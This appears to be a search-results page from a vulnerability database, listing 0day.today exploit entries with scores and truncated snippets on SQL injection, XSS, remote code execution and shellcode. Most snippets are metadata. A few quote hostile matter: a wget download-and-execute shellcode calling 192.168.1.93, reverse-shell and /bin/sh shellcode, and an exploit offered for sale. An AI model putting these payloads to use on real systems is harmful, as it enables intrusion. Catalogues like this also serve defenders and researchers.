Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
added 2018/11/05 12:0 a.m.194 views

WebVet 0.1a - id SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: WebVet 0.1a - 'id' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://webvet.exreality.net/ Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet20130708.zip Version: 0.1a Category: Webapps Tested...

0.2AI score
Exploits0
0day.today
0day.today
added 2016/12/03 12:0 a.m.194 views

Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution Vulnerabilities

Exploit for windows platform in category remote exploits I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "" is a pat...

7.5CVSS9.2AI score0.98518EPSS
Exploits28
0day.today
0day.today
added 2015/03/20 12:0 a.m.194 views

Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability

Exploit for windows platform in category dos / poc / Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability Vendor: Intel Product webpage: http://www.intel.com Affected products: Network Adapter Driver for Windows XP Network Adapter Driver for Windows 7 Network Adapter Driver for...

7.2CVSS0.3AI score0.09011EPSS
Exploits7
0day.today
0day.today
added 2010/07/17 12:0 a.m.194 views

Kayako eSupport v3.70.02 SQL injection Vulnerability

Exploit for php platform in category web applications ==================================================== Kayako eSupport v3.70.02 SQL injection Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' ...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/08/04 12:0 a.m.193 views

WordPress adivaha Travel Plugin 2.3 - Reflected XSS Vulnerability

Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS Exploit Author: CraCkEr Vendor: adivaha - Travel Tech Company Vendor Homepage: https://www.adivaha.com/ Software Link: https://wordpress.org/plugins/adiaha-hotel/ Demo: https://www.adivaha.com/demo/adivaha-online/ Version: 2.3...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/05/23 12:0 a.m.193 views

Prestashop 8.0.4 - CSV injection Vulnerability

Exploit Title: Prestashop 8.0.4 - CSV injection Application: prestashop Version: 8.0.4 Bugs: CSV Injection Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 14.05.2023 Author: Mirabbas Ağalarov Tested on: Windows 2...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/03/27 12:0 a.m.193 views

Online Diagnostic Lab Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution RCE Unauthenticated Exploit Author: yousef alraddadi - https://twitter.com/y0usef11 Vendor Homepage:...

6.8AI score
Exploits0
0day.today
0day.today
added 2022/02/08 12:0 a.m.193 views

QEMU Monitor HMP migrate Command Execution Exploit

This Metasploit module uses QEMU's Monitor Human Monitor Interface HMP TCP server to execute system commands using the migrate command. This module has been tested successfully on QEMU version 6.2.0 on Ubuntu 20.04. This module requires Metasploit: https://metasploit.com/download Current source:...

0.4AI score
Exploits0
0day.today
0day.today
added 2021/09/10 12:0 a.m.193 views

ECOA Building Automation System Authorization Bypass / Insecure Direct Object Reference

ECOA building automation systems suffer from authorization bypass and insecure direct object reference vulnerabilities. Many versions are affected. ECOA Building Automation System Authorization Bypass / IDOR Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version...

0.4AI score
Exploits0
0day.today
0day.today
added 2021/08/04 12:0 a.m.193 views

ApacheOfBiz 17.12.01 - Remote Command Execution via Unsafe Deserialization of XMLRPC arguments

Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution RCE via Unsafe Deserialization of XMLRPC arguments Exploit Author: Álvaro Muñoz, Adrián Díaz s4dbrd Vendor Homepage: https://ofbiz.apache.org/index.html Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip...

6.1CVSS0.9AI score0.98926EPSS
Exploits16
0day.today
0day.today
added 2021/07/29 12:0 a.m.193 views

CloverDX 5.9.0 - Cross-Site Request Forgery to Remote Code Execution Exploit

Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery CSRF to Remote Code Execution RCE Exploit Author: niebardzo Vendor Homepage: https://www.cloverdx.com/ Software Link: https://github.com/cloverdx/cloverdx-server-docker Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x Tested on:...

8.8CVSS0.04208EPSS
Exploits4
0day.today
0day.today
added 2020/08/05 12:0 a.m.193 views

ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service Exploit

Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service PoC Exploit Author: MegaMagnus Vendor Homepage: https://www.acti.com/ Software Link: https://www.acti.com/DownloadCenter Version: V.3.0.12.42 , V.2.3.04.07 Tested on: Windows 7, Windows 10 CVE: CVE-2020-15956...

7.5CVSS0.10522EPSS
Exploits5
0day.today
0day.today
added 2020/07/12 12:0 a.m.193 views

Pandora FMS 7.0 NG 746 Script Insertion / Code Execution Vulnerability

Pandora FMS 7.0 NG versions 746 and below remote code execution exploit that leverages cross site scripting. Requires administrator to perform an snmp scan with a cross site scripting payload. Exploit Title: PandoraFMS 7.0 NG ≤ 746 Remote Code Execution Date: July 2020 Author: AppleBois Version:...

7.3AI score
Exploits0
0day.today
0day.today
added 2020/06/16 12:0 a.m.193 views

Linux/ARM - execve /bin/dash Shellcode (32 bytes)

Title: Linux/ARM - execve /bin/dash Shellcode 32 bytes Category: Shellcode Tested: armv7l 32-bitRaspberry Pi 2 Model B OS: Raspbian Buster Lite Author: Anurag Srivastava Description: execve shellcode / Objdump pi@raspberrypi:/hex $ objdump -d ed1 ed1: file format elf32-littlearm Disassembly of...

7.1AI score
Exploits0
0day.today
0day.today
added 2020/03/13 12:0 a.m.193 views

AnyBurn 4.8 - Buffer Overflow (SEH) Exploit

Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...

0.1AI score
Exploits0
0day.today
0day.today
added 2019/11/30 12:0 a.m.193 views

Xinet Elegant 6 Asset Library Web Interface 6.1.655 SQL Injection Vulnerability

NAPC Xinet interface Elegant 6 Asset Library version 6.1.655 allows pre-authentication error-based SQL injection via the /elegant6/login LoginFormusername field when double quotes are used. + Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source:...

10AI score0.07941EPSS
Exploits3
0day.today
0day.today
added 2019/07/02 12:0 a.m.193 views

Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes

/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/06/30 12:0 a.m.193 views

Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/08/03 12:0 a.m.193 views

ASUS DSL-N12E C1 1.1.2.3_345 - Remote Command Execution Exploit

Exploit for hardware platform in category web applications Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/04/22 12:0 a.m.193 views

Interspire Email Marketer - Remote Admin Authentication Bypass Exploit

The function in charge of checking whether the user is already logged in init.php in Interspire Email Marketer IEM prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEMCookieLogin cookie with a specially crafted value. On top of that, if...

10CVSS0.4AI score0.36505EPSS
Exploits6
0day.today
0day.today
added 2018/03/20 12:0 a.m.193 views

Microsoft Windows Kernel - NtQueryVirtualMemory(MemoryMappedFilenameInformation) 64-bit Pool Memory

Exploit for windows platform in category dos / poc / We have discovered that the nt!NtQueryVirtualMemory system call invoked with the 2 information class MemoryMappedFilenameInformation discloses portions of uninitialized kernel pool memory to user-mode clients. The vulnerability affects 64-bit...

1.9CVSS5.5AI score0.02435EPSS
Exploits3
0day.today
0day.today
added 2014/05/10 12:0 a.m.193 views

Joomla! 3.3.0 SQL Injection / automatic upload shell Exploit (0day)

Joomla Core version 3.3.0 have suffers from a remote SQL injection vulnerability and upload shell. This is private exploit. You can buy it at https://0day.today...

8.3AI score
Exploits0
0day.today
0day.today
added 2025/01/15 12:0 a.m.192 views

WordPress SuperBackup 2.3.3 Shell Upload Vulnerability

CVE-2024-56064 WP SuperBackup = 2.3.3 - Unauthenticated Arbitrary File Upload Description The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.3.3. This makes it...

10CVSS7.1AI score0.14488EPSS
Exploits2
0day.today
0day.today
added 2024/07/09 12:0 a.m.192 views

Ivanti EPM RecordGoodApp SQL Injection / Remote Code Execution Exploit

Ivanti Endpoint Manager EPM 2022 SU5 and prior versions are susceptible to an unauthenticated SQL injection vulnerability which can be leveraged to achieve unauthenticated remote code execution. This module requires Metasploit: https://metasploit.com/download Current source:...

8.8CVSS9.4AI score0.99951EPSS
Exploits5
0day.today
0day.today
added 2024/06/02 12:0 a.m.192 views

Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure Exploit

Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure Exploit Author: Rizal Muhammed @ub3rsick Vendor Homepage: https://www.wipro.com/holmes/ Version: Wipro Holmes Orchestrator v20.4.1 Tested on: Windows CVE : CVE-2021-38283 import requests as rq import argparse import datetime...

7.5CVSS6.7AI score0.02412EPSS
Exploits5
0day.today
0day.today
added 2023/07/21 12:0 a.m.192 views

Perch v3.2 - Stored XSS Vulnerability

Exploit Title: Perch v3.2 - Stored XSS Application: Perch Cms Version: v3.2 Bugs: XSS Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ========================================...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/07/21 12:0 a.m.192 views

Boom CMS v8.0.7 - Cross Site Scripting Vulnerability

Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/04/08 12:0 a.m.192 views

Microsoft Windows 11 - (cmd.exe) Denial of Service Exploit

Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service Exploit Author: Milad Karimi Ex3ptionaL Date: 2023-03-30 Vendor Homepage: https://www.microsoft.com/en-us Software Link: https://www.microsoft.com/en-us Tested Version: N/A Tested on OS: Windows 11 Pro About App Microsoft Windows i...

6.8AI score
Exploits0
0day.today
0day.today
added 2023/04/02 12:0 a.m.192 views

perfSONAR v4.4.5 - Partial Blind CSRF Vulnerability

Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x = v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x = v4.4.5 within the...

4.3CVSS5.1AI score0.01991EPSS
Exploits4
0day.today
0day.today
added 2021/09/29 12:0 a.m.192 views

Pet Shop Management System 1.0 - Remote Code Execution (Unauthenticated) Exploit

Title: Pet Shop Management System 1.0 - Remote Code Execution RCE Unauthenticated Author: Mr.Gedik Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html Version: 1.0...

0.1AI score
Exploits0
0day.today
0day.today
added 2021/09/02 12:0 a.m.192 views

Dolibarr ERP / CRM 14.0.1 - Privilege Escalation Vulnerability

Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation Exploit Author: Vishwaraj101 Vendor Homepage: https://www.dolibarr.org/ Affected Version: = 14.0.1 Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d Summary: Using the below chain of issues...

0.7AI score
Exploits0
0day.today
0day.today
added 2021/03/03 12:0 a.m.192 views

Doctor Appointment System 1.0 SQL Injection Vulnerability

Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in comment parameter CVE: CVE-2021-27315 Exploit Author: Soham Bakore Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html Software Link:...

9.8CVSS0.3AI score0.12394EPSS
Exploits5
0day.today
0day.today
added 2020/08/10 12:0 a.m.192 views

BarcodeOCR 19.3.6 - (BarcodeOCR) Unquoted Service Path Vulnerability

Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path Exploit Author: Daniel Bertoni Vendor Homepage: https://www.barcode-ocr.com/ Version: 19.3.6 Tested on: Windows Server 2016, Windows 10 Find the Unquoted Service Path Vulnerability: C:\wmic service get...

0.2AI score
Exploits0
0day.today
0day.today
added 2020/08/06 12:0 a.m.192 views

Daily Expenses Management System 1.0 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Daily Expenses Management System 1.0 - Multiple Persistent Cross-Site Scripting Exploit Author: Edo Maland Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html Software Link:...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/11/12 12:0 a.m.192 views

Alps Pointing-device Controller 8.1202.1711.04 - (ApHidMonitorService) Unquoted Service Path

Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path Date: 2019-11-12 Exploit Author: Mario Rodriguez Vendor Homepage: https://www.alps.com/e/ Software Link: https://www.alps.com/e/ Version: 8.1202.1711.04 Tested on: Windows 10 Home x64 Spani...

0.5AI score
Exploits0
0day.today
0day.today
added 2019/10/07 12:0 a.m.192 views

ASX to MP3 converter 3.1.3.7 - (.asx) Local Stack Overflow (DEP) Exploit

Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP Exploit Author: max7253 Vendor Homepage: http://www.mini-stream.net/ Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe Version: 3.1.3.7.2010.11.05 Tested on: Microsoft...

Exploits0
0day.today
0day.today
added 2019/06/25 12:0 a.m.192 views

Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)

/ Title: Linux/x8664 - Reverse0.0.0.0:4444/TCPShell/bin/sh- Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/05/06 12:0 a.m.192 views

PHPads 2.0 - (click.php3?bannerID) SQL Injection Vulnerability

Exploit for php platform in category web applications + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...

0.3AI score
Exploits0
0day.today
0day.today
added 2019/04/15 12:0 a.m.192 views

RemoteMouse 3.008 - Arbitrary Remote Command Execution Exploit

""" Exploit Title: Remote Mouse 3.008 Failure to Authenticate Date: 4/9/2019 Exploit Author: 0rphon Software Link: https://www.remotemouse.net/ Version: 3.008 Tested on: Windows 10 Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it This script po...

0.9AI score
Exploits0
0day.today
0day.today
added 2019/02/24 12:0 a.m.192 views

Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution Vulnerability

Exploit for php platform in category web applications Drupal FALSE; instead of the standard unserialize$values'options';. As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link. Triggering the unserialize Having all...

6.8CVSS0.1AI score0.91919EPSS
Exploits22
0day.today
0day.today
added 2019/02/13 12:0 a.m.192 views

Raisecom Technology GPON-ONU HT803G-07 Command Injection (1)

Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the fmgponloid parameter. Raisecom Technology GPON-ONU HT803G-07 Command Injection 1 ===================================== Authenticated Shell Command Injection...

0.03506EPSS
Exploits3
0day.today
0day.today
added 2017/05/02 12:0 a.m.192 views

MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit

MySQL versions 5.6.35 and below and 5.7.17 and below suffer from an integer overflow vulnerability. ''' Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599poc.py Exploit Title: Remote MySQL DOS Integer Overflow Google Dork: N/A Date: 13th April 2017 Exploit Autho...

7.8CVSS8AI score0.89924EPSS
Exploits7
0day.today
0day.today
added 2009/05/13 12:0 a.m.192 views

Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability

Exploit for unknown platform in category web applications ============================================================= Mlffat 2.1 Auth Bypass / Cookie SQL Injection Vulnerability ============================================================= MLFFAT 2.1 - insecure Cookie Handling Buy:...

7.1AI score
Exploits0
0day.today
0day.today
added 2008/05/05 12:0 a.m.192 views

BackLinkSpider (cat_id) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ========================================================== BackLinkSpider catid Remote SQL Injection Vulnerability ========================================================== \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / /...

7.1AI score
Exploits0
0day.today
0day.today
added 2024/06/02 12:0 a.m.191 views

changedetection 0.45.20 Remote Code Execution Exploit

Exploit Title: changedetection = 0.45.20 Remote Code Execution RCE Exploit Author: Zach Crosman zcrosman Vendor Homepage: changedetection.io Software Link: https://github.com/dgtlmoon/changedetection.io Version: = 0.45.20 Tested on: Linux CVE : CVE-2024-32651 from pwn import import requests from...

10CVSS6.7AI score0.83722EPSS
Exploits5
0day.today
0day.today
added 2023/10/09 12:0 a.m.191 views

Kibana Prototype Pollution / Remote Code Execution Exploit

Kibana versions prior to 7.6.3 suffer from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value you can execute arbitrary code. Code execution is possible through two different ways. Either by sending data directly to Elastic, or using...

8.1AI score
Exploits0
0day.today
0day.today
added 2023/08/21 12:0 a.m.191 views

Academy LMS 6.1 Cross Site Scripting / File Upload Vulnerabilities

Exploit Title: Academy LMS 6.1 - Arbitrary File Upload Exploit Author: CraCkEr Vendor: Creativeitem Vendor Homepage: https://academylms.net/ Software Link: https://demo.academylms.net/ Tested on: Windows 10 Pro Impact: Allows User to upload files to the web server CWE: CWE-79 - CWE-74 - CWE-707...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/08/21 12:0 a.m.191 views

Global Multi School Management System Express v1.0 - SQL Injection Vulnerability

Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378 Tested on: Kali Linux & MacOS CVE: N/A Request POST /report/balance HTTP/1.1 Content-Type...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/07/19 12:0 a.m.191 views

Blackcat Cms v1.4 - Remote Code Execution Vulnerability

Exploit Title: Blackcat Cms v1.4 - Remote Code Execution RCE Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Lin...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/04/07 12:0 a.m.191 views

ChurchCRM 4.5.1 - Authenticated SQL Injection Exploit

Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection Exploit Author: Arvandy Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md Software Link: https://github.com/ChurchCRM/CRM/releases Vendor Homepage: http://churchcrm.io/ Version: 4.5.1 Tested on: Window...

6.4AI score
Exploits5
Total number of security vulnerabilities5000